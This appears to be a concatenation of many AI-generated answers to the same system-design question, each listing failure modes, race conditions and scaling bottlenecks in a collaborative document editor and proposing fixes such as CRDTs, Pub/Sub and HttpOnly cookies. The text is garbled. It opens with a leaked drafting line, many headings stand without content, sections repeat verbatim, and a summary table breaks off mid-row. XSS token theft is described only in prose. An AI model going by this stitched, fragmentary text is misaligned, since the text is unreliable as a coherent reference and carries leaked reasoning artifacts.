Now, let's produce the final answer.
I'll write in a structured manner, with each issue clearly labeled, maybe with a heading.
Answer:
The architecture described has several potential issues that could lead to failures, race conditions, and scaling bottlenecks. Below is a list of these issues, along with specific solutions and their trade-offs.
Conflict Resolution Using Client Timestamps
Lost Updates Due to Lack of Concurrency Control
UPDATE ... WHERE version = read_version). If the update fails, retry with the new state.Polling Delay and Database Load
WebSocket Server Failure and In-Flight Changes
Load Balancer Single Point of Failure
Redis Session Cache Availability
Database Write Scalability
JWT Stored in localStorage (XSS Risk)
Long JWT Expiry
CDN Caching API Responses
Cache-Control: no-cache, private headers on dynamic endpoints.Snapshot Generation Overhead
Polling Duplicate Processing
Load Balancer Not Load-Aware
WebSocket Connection Limits per Server
Offline Support and Network Partitions
High Frequency of Database Writes
These improvements would address the major risks and scalability limits, albeit with added complexity and potential trade-offs in performance, cost, or development effort. The exact choices depend on the required consistency, latency, and scale.The architecture described has several potential failure modes, race conditions, and scaling bottlenecks. Below is a list of these issues, along with specific solutions and their trade-offs.
UPDATE ... WHERE version = read_version). If the update fails, retry with the new state.Cache-Control: no-cache, private headers on dynamic endpoints.These improvements would address the major risks and scalability limits, albeit with added complexity and potential trade-offs in performance, cost, or development effort. The exact choices depend on the required consistency, latency, and scale.
Certainly! Let's break down the potential failure modes, race conditions, and scaling bottlenecks in the architecture, and propose solutions for each.
Single Point of Failure in WebSocket Connections:
Database Overload:
Redis Cache Failure:
JWT Token Expiry Management:
Last-Write-Wins Conflict Resolution:
WebSocket Broadcast Delays:
WebSocket Server Scalability:
Database Read/Write Scalability:
Polling for Changes:
CDN Caching Strategy:
WebSocket Load Balancer:
Distributed Database or NoSQL:
Redis Clustering or Managed Service:
Token Refresh Mechanism:
Operational Transformation (OT) or CRDTs:
Message Broker for Real-time Messaging:
WebSocket Server Cluster with Shared Message Bus:
Database Sharding or Distributed Database:
Message Broker for Change Propagation:
Granular Caching Strategy:
By addressing these issues, the architecture can be made more robust, scalable, and reliable, albeit with increased complexity and potential costs.
WebSocket Connection Failures:
Single Point of Failure in PostgreSQL:
Race Conditions in Conflict Resolution:
Polling Overhead:
JWT Token Expiry and Security:
CDN Caching Issues:
Scaling Bottlenecks in WebSocket Servers:
Document Partitioning Issues:
WebSocket Connection Failures:
Single Point of Failure in PostgreSQL:
Race Conditions in Conflict Resolution:
Polling Overhead:
JWT Token Expiry and Security:
CDN Caching Issues:
Scaling Bottlenecks in WebSocket Servers:
Document Partitioning Issues:
By addressing these issues, the architecture can become more robust, scalable, and secure, ensuring a better user experience in a real-time collaborative document editor.
This architecture has several significant flaws, particularly concerning real-time consistency, data integrity, and horizontal scaling complexity.
Here is a detailed breakdown of the potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions and their trade-offs.
These issues directly impact the user experience and correctness of the document state.
The Issue: The core problem lies in how state synchronization happens between the API servers.
Race Condition: A race condition exists between an edit being written by Server A and Server B polling for that edit.
Solution: Eliminate Polling and Use a Central Message Broker.
document-updates:doc_id_123).The Issue: The sync strategy relies on Last-Write-Wins (LWW) using client-provided timestamps. Client clocks are notoriously unreliable, leading to incorrect conflict resolution.
Solution: Use Server-Assigned Timestamps or Operational Transformation (OT) / Conflict-Free Replicated Data Types (CRDTs).
The Issue: Documents are only saved as full HTML snapshots every 30 seconds. If a server crashes or the network drops between the last save and an edit, that edit is lost (unless the Message Broker is 100% durable and all servers correctly process the backlog).
Solution: Commit Every Change to the Database.
These issues relate to how the system handles increased load.
The Issue: "Each API server maintains its own WebSocket connections." This makes scaling difficult because user state (which document they are editing, which server they are on) is sticky. If Server A goes down, all its connected users instantly disconnect and must re-establish a session, potentially connecting to a different server (Server B).
Solution: Introduce a Centralized WebSocket Gateway/Proxy.
The Issue: If every change (even small text insertions) is written directly to PostgreSQL, the write throughput requirement will rapidly exceed what a single primary PostgreSQL instance can handle, even with read replicas handling reads.
Solution: Utilize Redis for High-Frequency Write Buffering/Sequencing.
The Issue: The CDN (CloudFront) is configured to cache API responses for 5 minutes. For a real-time collaborative editor, API responses are generally used for initial document loading or fetching metadata. Caching them for 5 minutes is highly risky.
Solution: Restrict CDN Caching to Static Assets Only.
Cache-Control: no-cache, no-store, must-revalidate).The Issue: JWTs with 24-hour expiry are stored in localStorage.
Solution: Use HttpOnly Cookies for Session Management.
localStorage for authentication, use traditional session cookies marked as HttpOnly and Secure. The backend issues this cookie upon successful login. HttpOnly prevents client-side JavaScript (including malicious scripts) from accessing the token.The Issue: The architecture implies JWTs are used for the initial HTTP connection, but it doesn't specify how the WebSocket connection is authenticated. If the WebSocket simply upgrades the connection without re-validating the session (e.g., relying on the client sending the old token in the upgrade request), security is weak.
Solution: Validate Token on WebSocket Upgrade.
This architecture, while functional, has several critical flaws, particularly in its real-time synchronization, data consistency, and scaling strategy.
Here is a detailed breakdown of the potential failure modes, race conditions, and bottlenecks, along with proposed solutions.
The core weakness is the reliance on Last-Write-Wins (LWW) with client-side timestamps and the server-polling strategy.
| Issue Type | Failure Mode / Race Condition | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Race Condition | Inconsistent State Due to Client Clock Drift | If User A (with a fast clock) and User B (with a slow clock) edit the same section, the LWW strategy will incorrectly favor User A's change, even if User B's change occurred later in real-time. | Server-Side Timestamping (Preferred): The server applies the timestamp upon receiving the change. Trade-offs: Simple to implement. Requires clients to trust the server's time. Still susceptible to network latency variation (changes arriving out of order). |
| Data Consistency | Missing Updates Due to Polling Gap | Server 1 receives a change, writes to PostgreSQL, and broadcasts to its clients. Server 2 polls PostgreSQL every 2 seconds. A client connected to Server 2 might miss the update for up to 2 seconds, leading to a stale view and potential LWW conflicts when they eventually submit a change based on old data. | Centralized Pub/Sub for Inter-Server Sync: Use a distributed message queue (e.g., Kafka, RabbitMQ) or a dedicated pub/sub layer (e.g., Redis Pub/Sub) to broadcast changes instantly across all API servers. Trade-offs: Adds complexity and another critical component (the message broker). Significantly reduces synchronization latency. |
| Data Consistency | Non-Deterministic Conflict Resolution | Using LWW on full paragraph edits is coarse-grained. A user might lose significant, non-overlapping work if another user saves a trivial change to the same paragraph slightly later. | Operational Transformation (OT) or Conflict-Free Replicated Data Types (CRDTs): Move away from LWW snapshots. Use OT or CRDTs to merge fine-grained operations (insert character, delete character) mathematically, ensuring all collaborators converge to the same state regardless of the order of arrival. Trade-offs: Highly complex to implement and debug. Required for a professional collaborative editor. |
| Race Condition | Broadcast Inconsistency (Split-Brain) | Server 1 writes to PostgreSQL, broadcasts to its 10 clients. Before Server 2 polls, Server 1 crashes. The change is in the DB, but 90% of the clients (on other servers) don't see the change until Server 2 polls 2 seconds later. | Requires Centralized Pub/Sub (Solution to Polling Gap): A centralized message broker ensures that if S1 successfully commits to the DB, it also commits to the message queue, guaranteeing the broadcast will happen even if S1 fails immediately afterward. |
| Failure Mode | Database Write Bottleneck | Every single character typed by any user results in a PostgreSQL write. This high-frequency write load will quickly overwhelm a single PostgreSQL instance, especially during peak usage. | Batching Writes and Asynchronous Persistence: The API server should buffer changes locally for a very short period (e.g., 50ms) and submit them as a single batched transaction to PostgreSQL. Use a durable message queue (e.g., Kafka) as the primary write buffer, allowing the DB writer process to consume and persist changes asynchronously. Trade-offs: Increases complexity. Improves write throughput dramatically but slightly increases the latency of final persistence. |
| Issue Type | Bottleneck / Failure Mode | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Scaling Bottleneck | Sticky Sessions (Load Balancer) | While not explicitly stated, if the load balancer uses round-robin without any persistence mechanism, a client might hit a different API server on a reconnect, forcing a new WebSocket connection and potentially losing context. | Use a Layer 7 Load Balancer with Consistent Hashing or Sticky Sessions: Ensure that a client is consistently routed to the same API server based on its ID (if possible) or use a sticky session duration long enough to cover typical connection drops. Trade-offs: Sticky sessions can lead to uneven load distribution if one server has a few very high-traffic users. |
| Failure Mode | Document Snapshotting Overhead | Saving the full HTML snapshot every 30 seconds for every active document is extremely storage-intensive and generates massive write spikes every half-minute. | Differential Versioning / Change Logs: Instead of full snapshots, store a chronological log of the tiny operational changes (the diffs). Periodically (e.g., every 5 minutes or 1000 operations), the server can generate a full "base" snapshot from the logs. Trade-offs: Reduces storage and write spikes significantly. Requires complex logic to rebuild the document state from the logs. |
| Scaling Bottleneck | Redis Single Point of Failure (SPOF) | Redis is used for session caching. If the single Redis instance fails, all users are logged out, forcing re-authentication and potential service outage. | Redis Sentinel or Cluster: Implement a highly available Redis setup using Sentinel (for automatic failover) or a full Redis Cluster (for sharding and high availability). Trade-offs: Increases operational complexity but eliminates the SPOF risk for session management. |
| Failure Mode | Loss of WebSocket State on Server Restart | WebSocket connections are stateful. If an API server restarts, all connected clients are dropped and must reconnect, causing a temporary service disruption and increased load on the remaining servers. | Graceful Shutdown and Connection Draining: Implement a process where the server stops accepting new connections, allows existing connections to finish their current transactions, and sends a "reconnect soon" signal before shutting down. Use a load balancer health check to quickly remove the failing server from the rotation. Trade-offs: Reduces abrupt disconnects but increases complexity in deployment pipelines. |
| Scaling Bottleneck | Document Partitioning Strategy | Partitioning only by organization ID means that very large organizations (e.g., 100,000 users) could still overwhelm a single database shard. | Compound Partitioning: Partition by Organization ID first, then by Document ID. This distributes the load for extremely active organizations across multiple shards. Trade-offs: Increases complexity of routing and cross-shard queries (if needed), but greatly enhances maximum scaling capacity. |
| Issue Type | Failure Mode / Security Risk | Explanation | Proposed Solution & Trade-offs |
|---|---|---|---|
| Security Risk | JWT in localStorage | Storing JWTs in localStorage makes them highly vulnerable to XSS (Cross-Site Scripting) attacks, as any malicious script injected into the page can easily access and steal the token. | Use HttpOnly Cookies: Store the JWT token (or a reference token) in an HttpOnly cookie. This prevents client-side JavaScript from accessing the cookie, mitigating XSS risks. Trade-offs: Requires careful handling of CSRF (Cross-Site Request Forgery) protection (e.g., using a CSRF token in headers). |
| Failure Mode | CDN Caching of API Responses | Caching API responses for 5 minutes is fundamentally incompatible with a real-time system. If an API endpoint is hit directly (e.g., to fetch the document's initial state), that state could be 5 minutes old. | Disable Caching for Dynamic/API Endpoints: Ensure CloudFront only caches static assets (/images, /js, /css). API endpoints (e.g., /api/v1/docs/) must have caching explicitly disabled or set Cache-Control: no-store, max-age=0. Trade-offs: Reduces CDN cost savings for dynamic content, but ensures data freshness. |
| Failure Mode | Front-end Error Handling | If the client's WebSocket connection drops, the application must handle the reconnection gracefully, resending any operations that were queued during the disconnect. | Client-Side Operation Queue and Sequence Numbers: The client should maintain a queue of pending operations and use a global sequence number (or version number) obtained from the server. Upon reconnection, the client sends its last known sequence number, and the server replays any missed operations. Trade-offs: Adds significant complexity to the frontend state management. Essential for robust real-time applications. |
Of course. This is an excellent exercise. The provided architecture has several critical issues that would prevent it from functioning as a reliable, scalable, real-time system.
Here is a breakdown of the potential failure modes, race conditions, and scaling bottlenecks, along with proposed solutions.
This is the most critical data integrity problem in the architecture.
N), the number of polling queries to the database increases linearly (N queries every 2 seconds). This creates immense, constant, and largely useless load on the database, making it the primary bottleneck for the entire system.document-123, it publishes that change to a document-123 topic/channel on the message bus (e.g., Redis Pub/Sub, RabbitMQ, or Kafka).document-123 will be subscribed to that topic.localStoragelocalStorage is a well-known security risk. It makes the application vulnerable to Cross-Site Scripting (XSS) attacks. If an attacker can inject malicious JavaScript onto the page (e.g., through a third-party library), they can read the JWT from localStorage and send it to their own server, allowing them to impersonate the user and gain full access to their account.httpOnly cookies to store authentication tokens.
httpOnly cookie cannot be accessed by JavaScript, which mitigates XSS-based token theft.httpOnly cookie and a short-lived access token (the JWT) in memory on the client. When the access token expires, the client uses the refresh token (sent automatically by the browser) to silently request a new one.Of course. This is an excellent exercise. The proposed architecture has several critical flaws that would prevent it from functioning as a reliable, real-time, or scalable system.
Here is a breakdown of the issues, categorized for clarity, along with specific solutions and their trade-offs.
This is the most severe data integrity problem. Client-side clocks cannot be trusted; they drift, can be set incorrectly, or can be manipulated by a user. This will lead to definite data loss.
Scenario:
Solution: Implement a proper concurrency control algorithm like Operational Transformation (OT) or use a Conflict-free Replicated Data Type (CRDT).
insert 'a' at position 5, delete 1 char at position 12). A central server receives operations, transforms them against other recent operations to ensure they can be applied correctly, and then broadcasts the transformed operation. Each operation is versioned sequentially.Trade-offs:
Caching API responses for a real-time collaborative document for 5 minutes is fundamentally incorrect and will cause major consistency problems.
Scenario:
Solution: Do not cache the API endpoints that serve document content. The CDN (CloudFront) should only be used for its primary purpose: caching static assets like JavaScript bundles, CSS files, images, and fonts. API calls for dynamic content like a document body must always go to the origin servers.
Trade-offs:
This is the most severe scaling bottleneck. The architecture does not support real-time communication between users connected to different servers. The 2-second polling is a slow, inefficient, and unscalable workaround.
Scenario:
100 servers * 30 queries/min = 3000 queries/min) that will crash the database.Solution: Use a dedicated Pub/Sub Message Bus. Decouple real-time messaging from the API servers. Use a service like Redis Pub/Sub, RabbitMQ, or Kafka.
doc-changes:document-123).Trade-offs:
Writing the entire document every 30 seconds is highly inefficient.
Scenario: A 1MB document is being edited. A user changes one character. The system writes 1MB to the database. This creates massive write I/O, wastes storage space, and makes it impossible to have a granular "Version History" feature. It also means up to 29 seconds of work can be lost if a server crashes.
Solution: Store Deltas/Operations, Not Snapshots. Align the storage strategy with the sync strategy (OT or CRDT).
insert 'a' at position 5, version 43), it writes that small operation to a database table (e.g., document_operations).Trade-offs:
The current WebSocket broadcast is "fire-and-forget." If a client has a momentary network blip, they will miss an update and their document state will permanently diverge from everyone else's until the next full save/refresh.
Solution: Implement a Versioning and Catch-up Mechanism. This is a natural extension of using OT or CRDTs.
I am on v42).document_operations table for all operations after v42 and send them to the client to "catch up."Trade-offs:
Storing the JWT in localStorage is a known security vulnerability.
Problem: If your application has a Cross-Site Scripting (XSS) vulnerability (e.g., from a dependency or user-generated content that isn't properly sanitized), an attacker can inject a script that reads the JWT from localStorage. They can then use this token to impersonate the user completely.
Solution: Store the JWT in a Secure, httpOnly Cookie.
When the user logs in, the server sets the JWT in a cookie with the httpOnly and Secure flags.
httpOnly: Prevents JavaScript from accessing the cookie, mitigating XSS-based token theft.Secure: Ensures the cookie is only sent over HTTPS.
The browser will automatically include this cookie in all subsequent HTTP API requests and in the initial WebSocket connection handshake for authentication.Trade-offs:
SameSite=Strict or SameSite=Lax cookie attribute or by implementing anti-CSRF tokens. This is a standard and well-understood security trade-off.Of course. This is a great exercise. The proposed architecture has several critical flaws that would prevent it from functioning as a reliable, real-time collaborative editor at scale.
Here is a breakdown of the issues, categorized for clarity.
10:00:00 EST. User B (in London) edits the same paragraph a second later at 15:00:01 GMT (which is 10:00:01 EST). If User A's computer clock is 2 seconds fast, their change will be timestamped 10:00:02 and will incorrectly overwrite User B's later change. The result is non-deterministic and leads to lost work.doc-changes:document-123).(doc_id, user_id, version, operation_payload).document_id they were last editing. The server can then seamlessly re-subscribe them to the document's Pub/Sub channel without the user noticing anything more than a brief flicker./api/documents/{id} and show the old title for up to 5 minutes. This creates a confusing and inconsistent user experience./api/*) should be configured to bypass the CDN cache and go directly to the origin (the load balancer).localStorage makes the application vulnerable to Cross-Site Scripting (XSS). If an attacker finds an XSS vulnerability, they can inject script to steal the JWT from localStorage and use it to impersonate the user completely.HttpOnly, Secure, and SameSite=Strict flags.HttpOnly: Prevents JavaScript from accessing the cookie, mitigating XSS-based theft.Secure: Ensures the cookie is only sent over HTTPS.SameSite=Strict: Prevents the browser from sending the cookie on cross-site requests, mitigating CSRF.localStorage. The browser handles token storage and transmission automatically and securely.This architecture contains several critical flaws that would prevent it from functioning as a "Google Docs" clone. The most significant issues involve data integrity, synchronization latency, and security.
Cache-Control: no-cache. Rely on Redis for fast document state retrieval.This architecture contains several critical flaws that will prevent it from functioning as a collaborative editor, likely resulting in data loss, massive latency, and immediate scaling failures.
Here is a breakdown of the failure modes, race conditions, and bottlenecks, along with architectural fixes.
Failure Mode: Client-Side Timestamp LWW (Last-Write-Wins) Using client-side timestamps for conflict resolution is catastrophic.
Solution: CRDTs (Conflict-free Replicated Data Types) or OT (Operational Transformation)
Instead of sending full HTML snapshots or raw text replacements, send operations (e.g., insert 'a' at index 5).
Failure Mode: Database Polling Strategy "Other servers poll PostgreSQL every 2 seconds for changes."
Solution: Redis Pub/Sub Backplane Since you already have Redis, use its Pub/Sub capabilities.
doc_updates:UUID). All servers subscribe to channels for documents they currently have open.Failure Mode: Round-Robin with WebSocket State
Solution: Consistent Hashing / Application-Layer Routing
Route connections based on the Document ID, not just round-robin.
Failure Mode: Write Amplification & Data Loss
Solution: Write-Behind Log + Vector/Delta Storage
Failure Mode: CDN Caching API Responses "CloudFront ... caches API responses for 5 minutes."
Solution: No-Cache Headers for Dynamic Data
Cache-Control: no-store, no-cache, must-revalidate. CloudFront should only cache static assets (JS, CSS, Images).Failure Mode: JWT in LocalStorage
localStorage makes them accessible to any JavaScript running on the page. If the app has a single XSS vulnerability (common in rich text editors handling HTML), an attacker can steal the token and impersonate the user.Solution: HttpOnly Cookies
HttpOnly; Secure; SameSite=Strict cookie. The browser handles sending it; JS cannot read it.Failure Mode: Partitioning by Org ID
Solution: Sharding by Document ID
hash(DocumentID). This ensures an even distribution of load regardless of the organization size.This architecture contains several critical flaws that would lead to data loss, inconsistent state, and poor user experience in a real-time environment.
Issue: The architecture only broadcasts changes to clients connected to the same server. Because connections are distributed across multiple servers, users on Server A will never see edits made by users on Server B in real-time. Solution: Implement a Pub/Sub mechanism (using Redis Pub/Sub). When a server receives an update, it publishes the change to a Redis channel. Every API server subscribes to this channel and broadcasts the update to all its connected clients.
Issue: Relying on client-side timestamps for conflict resolution is dangerous. Client clocks drift; a user with a "future" clock will consistently overwrite everyone else's work. Furthermore, LWW at the paragraph level results in "lost updates" (e.g., if User A adds a word and User B adds a word to the same paragraph, one user's edit is deleted entirely). Solution: Move to Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs). Use a logical clock (Lamport timestamp) or a central sequencer at the server level to order operations.
Issue: Polling PostgreSQL every 2 seconds is inefficient and creates a "thundering herd" problem as the user base grows. Additionally, the standard "write to DB" flow on every keystroke will kill PostgreSQL performance under load. Solution:
Issue: Caching API responses for 5 minutes via CloudFront is catastrophic for a collaborative editor. Users will see "stale" document states for up to 5 minutes, effectively breaking real-time collaboration.
Solution: Disable CDN caching for WebSocket-related API endpoints or any document-fetching route. Use Cache-Control headers (no-store, no-cache) for dynamic document data.
Issue: Storing JWTs in localStorage makes the application vulnerable to Cross-Site Scripting (XSS) attacks, where a malicious script can steal the token. 24-hour expiry without a refresh mechanism forces a hard logout, disrupting work.
Solution: Store JWTs in HttpOnly, Secure, SameSite=Strict cookies. Implement a Refresh Token rotation strategy.
Issue: Saving full HTML snapshots every 30 seconds is inefficient for long documents and creates a "gap" where the last 29 seconds of work could be lost if the server crashes. Solution: Store the Operation Log (the sequence of edits) as the source of truth. Take snapshots only as an optimization to speed up document loading (e.g., once every 100 edits).
Issue: Round-robin load balancing is fine for REST, but WebSockets are long-lived. If the load balancer kills a connection during a rolling deployment, the user loses their collaborative state.
Solution: Implement "Graceful Shutdown" in the Node.js servers, allowing existing WebSocket connections to drain before the server process exits. Use sticky sessions if the architecture requires it, though a well-implemented Pub/Sub model makes this less critical.
| Feature | Current State | Proposed State |
|---|---|---|
| Sync | LWW (Client Timestamps) | CRDTs / OT (Logical Sequencing) |
| Broadcast | Local Server Only | Redis Pub/Sub |
| DB Sync | Polling every 2s | Asynchronous buffering + CDC |
| Caching | 5-min CDN Cache | No caching for dynamic data |
| Auth | LocalStorage | HttpOnly Cookies + Refresh Tokens |
This architecture contains several critical flaws that would prevent it from functioning as a real-time collaborative editor (like Google Docs). It suffers from severe race conditions, unscalable database access patterns, and fundamental misunderstandings of distributed state.
Here is a detailed breakdown of the failure modes, race conditions, and scaling bottlenecks, along with specific solutions and trade-offs.
Issue: Last-Write-Wins (LWW) with Client Clocks
Issue: Isolated WebSockets + Round-Robin Load Balancing
Issue: Polling PostgreSQL Every 2 Seconds
Issue: Saving Full HTML Snapshots Every 30 Seconds
Issue: CDN Caching API Responses for 5 Minutes
/api/documents/123), users will load documents that are up to 5 minutes out of date. They will overwrite recent work because their client starts from a stale state.Issue: JWTs with 24-hour Expiry in LocalStorage
localStorage makes them highly vulnerable to Cross-Site Scripting (XSS) attacks. If a malicious script runs, it can steal the token. A 24-hour expiry means the attacker has a full day to impersonate the user, and standard JWTs cannot be easily revoked.Issue: Document Partitioning by Organization ID
Okay, let's break down the potential failure modes, race conditions, and scaling bottlenecks in this real-time collaborative document editor architecture, along with proposed solutions and their trade-offs. I'll organize this into categories: Frontend, Backend, Database, Real-time Sync, and General.
I. Frontend (React SPA)
II. Backend (Node.js API Servers)
III. Database (PostgreSQL)
IV. Real-time Synchronization (WebSocket & Polling)
V. Storage (HTML Snapshots & CDN)
VI. Authentication (JWT)
Scaling Bottlenecks & Solutions (Beyond those addressed above)
Summary of Critical Improvements
This detailed breakdown should give you a solid understanding of the potential issues and how to address them in this real-time collaborative document editor architecture. Remember that choosing the right solutions involves balancing trade-offs between complexity, cost, and performance.
Here’s a breakdown of potential issues with the provided real-time collaborative editor architecture, along with proposed solutions and associated trade-offs. I'll categorize them for clarity.
I. Failure Modes (System Downtime or Data Loss)
II. Race Conditions (Data Inconsistency)
documents table.
III. Scaling Bottlenecks (Performance Degradation under Load)
Important Considerations:
This analysis provides a starting point for identifying and addressing potential issues. The best solutions will depend on the specific requirements and constraints of the application. A phased rollout with careful monitoring is crucial for success. Remember to prioritize based on risk and impact.
Okay, let's break down the architecture for this real-time collaborative document editor. I'll identify potential failure modes, race conditions, and scaling bottlenecks, followed by proposed solutions with their associated trade-offs.
Here's a comprehensive analysis, categorized for clarity.
I. Failure Modes
II. Race Conditions
III. Scaling Bottlenecks
Here's a breakdown of potential issues in the proposed architecture, along with proposed solutions and their trade-offs.
I. Failure Modes
API Server Failure:
Database Failure:
Redis Failure:
CDN Failure:
Network Issues:
II. Race Conditions
Last-Write-Wins Conflicts:
Session Conflicts:
Data Consistency during Synchronization:
III. Scaling Bottlenecks
PostgreSQL Database:
API Server Load:
Network Bandwidth:
Redis Bottleneck:
Document Serialization/Deserialization:
Summary Table:
| Issue | Failure Mode | Race Condition | Scaling Bottleneck | Solution(s) | Trade-offs |
|---|---|---|---|---|---|
| API Server Failure | Failure | N/A | Capacity | Redundancy, Health Checks, Failover | Infrastructure Cost, Potential Instability |
| Database Failure | Failure | N/A | Capacity | Replication, Backup & Restore, Failover | Complexity, Downtime |
| Redis Failure | Failure | N/A | Capacity |
These changes improve reliability, reduce race conditions, and address scaling bottlenecks, though some add complexity or require additional infrastructure.
Issue: WebSocket connections are server-specific, causing connection loss during server failover or scaling events.
Solution: Implement a connection pool with automatic reconnection logic in the client. Use a consistent hashing load balancer that preserves affinity during scaling.
Trade-offs:
Issue: Client clocks can be out of sync, leading to incorrect conflict resolution where earlier edits overwrite newer ones.
Solution: Implement vector clocks or version vectors instead of simple timestamps. Track edit history and allow manual conflict resolution when detected.
Trade-offs:
Issue: 2-second polling creates unnecessary database load and potential for stale data between servers.
Solution: Replace polling with a publish-subscribe system (like Redis Pub/Sub) for real-time change propagation between servers.
Trade-offs:
Issue: Partitioning by organization ID may lead to hot partitions for large organizations.
Solution: Implement sharding at the document level rather than organization level, with a consistent hashing ring for distribution.
Trade-offs:
Issue: 24-hour expiry and localStorage storage creates poor UX for long sessions and security risks if device is compromised.
Solution: Implement refresh tokens with shorter-lived JWTs. Store refresh tokens in HttpOnly cookies with secure flags.
Trade-offs:
Issue: Storing full HTML snapshots every 30 seconds is inefficient and creates storage bloat.
Solution: Implement operational transformation or differential synchronization to store only changes between versions.
Trade-offs:
Issue: Caching API responses for 5 minutes conflicts with real-time document updates.
Solution: Don't cache document-related API responses. Only cache static assets and user-specific responses with appropriate cache headers.
Trade-offs:
Issue: Multiple servers writing to the same document rows creates lock contention.
Solution: Implement optimistic locking with version numbers or implement a write coordinator pattern for document updates.
Trade-offs:
Issue: Single point of failure for session data if Redis goes down.
Solution: Implement Redis clustering with replication, and add a fallback to database lookup for sessions if Redis is unavailable.
Trade-offs:
Issue: Round-robin load balancing breaks WebSocket affinity when servers are added/removed.
Solution: Use a consistent hashing load balancer that maintains session affinity even as the server pool changes.
Trade-offs:
Issue: Client clocks can be significantly out of sync, affecting conflict resolution.
Solution: Implement server-side timestamping for all operations, and adjust client clocks using NTP synchronization.
Trade-offs:
Issue: No mechanism to revert to previous versions or track edit history.
Solution: Implement a version control system for documents with regular snapshots and delta storage.
Trade-offs:
Issue: Network partitions can cause some servers to be isolated, leading to inconsistent state.
Solution: Implement a quorum-based system for document updates and use consensus protocols for critical operations.
Trade-offs:
Issue: Each server maintains its own WebSocket connections, which can consume significant memory at scale.
Solution: Implement a dedicated WebSocket service that can scale independently, using a message broker to route updates.
Trade-offs:
Issue: Loading full document history on initial connect can be slow for large documents.
Solution: Implement incremental loading with virtual scrolling, loading only visible portions initially.
Trade-offs:
These solutions address the major failure modes, race conditions, and scaling bottlenecks while considering the trade-offs between complexity, performance, and reliability. The specific implementation would depend on the exact requirements and constraints of the system.
This is an excellent and classic architecture for a real-time system that contains several critical flaws. Let's break down the issues, from the most severe to the more subtle, and propose solutions.
These are issues where the timing of events leads to an incorrect or inconsistent state.
doc-updates:12345).These are points where the system can break down completely.
document_events table in PostgreSQL or a system like Kafka).localStorage makes them vulnerable to Cross-Site Scripting (XSS) attacks. If any malicious script runs on your page, it can steal the token and impersonate the user.HttpOnly cookie. This makes it inaccessible to JavaScript and mitigates XSS-based token theft.These are components that will prevent the system from handling increased load.
This architecture contains several critical flaws that will lead to data corruption, poor user experience, and database failure under load. Specifically, the reliance on client-side clocks for synchronization and polling the database for real-time updates are fundamental anti-patterns for collaborative editing.
Here is the breakdown of failure modes, race conditions, and bottlenecks, ordered by severity, with proposed solutions and trade-offs.
The Issue: The system relies on "Last-write-wins with timestamps from client clocks." This is a fatal flaw for collaborative editing.
Solution: Implement Operational Transformation (OT) or Conflict-free Replicated Data Types (CRDTs).
Trade-offs:
The Issue: "Other servers poll PostgreSQL every 2 seconds for changes."
Solution: Introduce a Pub/Sub Message Broker (e.g., Redis Pub/Sub, Kafka, or RabbitMQ).
Trade-offs:
The Issue: "Documents saved as full HTML snapshots every 30 seconds."
Solution: Append-Only Operation Log + Periodic Snapshotting.
operations table.Trade-offs:
The Issue: "Document partitioning by organization ID."
Solution: Partition by Document ID (Hashing).
Trade-offs:
The Issue: "Load balancer (round-robin)" + "Each API server maintains its own WebSocket connections."
Solution: Session Affinity (Sticky Sessions) at the Load Balancer level.
Trade-offs:
The Issue: "JWT tokens... stored in localStorage."
localStorage and steal the user's identity token.Solution: Store JWTs in HttpOnly, Secure, SameSite Cookies.
Trade-offs:
The Issue: "CDN... caches API responses for 5 minutes."
Solution: Do not cache dynamic document content at the CDN.
Trade-offs:
To make this system viable, you must:
Here is an analysis of the failure modes, race conditions, and scaling bottlenecks in the proposed architecture, followed by specific solutions and their trade-offs.
Issue: Unreliable Client-Clock Timestamps (The "Client Time" Problem)
Last-Write-Wins (LWW) based on timestamps provided by the client's browser clock.
Issue: The "Polling Gap" (2-Second Latency)
doc:123:updates).Issue: CDN Cache Invalidation (The "Stale Data" Problem)
GET /doc/123?ver=abc) so the CDN caches the latest version automatically.Issue: Full HTML Snapshots vs. Delta Storage
<b> tag and User B changes a word, merging the snapshots is error-prone and can corrupt the DOM structure.{ "action": "insert", "text": "Hello", "index": 10 }) rather than the full document.Issue: Server-Side State Loss (The "Crash" Problem)
idempotency_key.Issue: The "Server Affinity" Bottleneck
This architecture contains several critical flaws that would lead to data loss, poor user experience, and system instability under load. Below is a detailed breakdown of the failure modes, race conditions, and bottlenecks, organized by category.
Issue: The "Isolated Island" Problem (Inter-Server Latency)
doc:{id}). All API servers subscribe to this channel. When Server 2 receives the message, it pushes the update to its connected WebSocket clients immediately.Issue: Destructive Conflict Resolution (Last-Write-Wins)
insert('a', position 5)). These algorithms merge concurrent operations mathematically so both changes are preserved.Issue: Unreliable Timestamps (Client Clocks)
Issue: Write Amplification (Keystroke-to-DB)
Issue: Polling Overhead
Issue: Storage Strategy (Full HTML Snapshots)
retain 5, insert 'x'). Periodically create snapshots (checkpoints) to optimize loading, but rely on the operation log for history.Issue: CDN Caching API Responses
Cache-Control: no-store. Use the CDN only for static assets (JS/CSS/Images).ETags so clients only download full content if it has changed.Issue: XSS Vulnerability via LocalStorage
localStorage makes them accessible to any JavaScript running on the page.Issue: WebSocket Connection State & Load Balancer
This architecture contains several fundamental flaws that would prevent it from functioning correctly at scale, and several others that would cause severe data loss or degraded user experiences.
Here is a comprehensive breakdown of the failure modes, race conditions, and bottlenecks, categorized by system layer, along with specific solutions and trade-offs.
Issue A: Last-Write-Wins (LWW) with Client Clocks
Issue B: The 2-Second Cross-Server Polling Lag
Issue C: Writing Every Keystroke to PostgreSQL
Issue D: Full HTML Snapshots Every 30 Seconds
Issue E: CloudFront Caching API Responses for 5 Minutes
Cache-Control: no-store for all document mutation and retrieval APIs.Issue F: JWT in localStorage
localStorage makes them highly vulnerable to Cross-Site Scripting (XSS) attacks. If any third-party script or compromised dependency executes localStorage.getItem('token'), the attacker has full access to the user's account. Furthermore, a 24-hour expiry with no refresh mechanism means compromised tokens are valid for a full day.SameSite=Strict mitigates most of this.Issue G: Partitioning by Organization ID
Issue H: Round-Robin Load Balancing with WebSockets
To build this reliably, you should fundamentally alter the data flow to look like this:
Failure Modes:
Single Point of Failure: If PostgreSQL database fails, the whole system will be unavailable.
Session Cache Failure: If Redis fails, all sessions will be lost.
JWT Token Expiry: If a JWT token expires during an active session, the user will be logged out.
Race Conditions:
Scaling Bottlenecks:
Database Scalability: The PostgreSQL database might become a bottleneck when there are many concurrent writes.
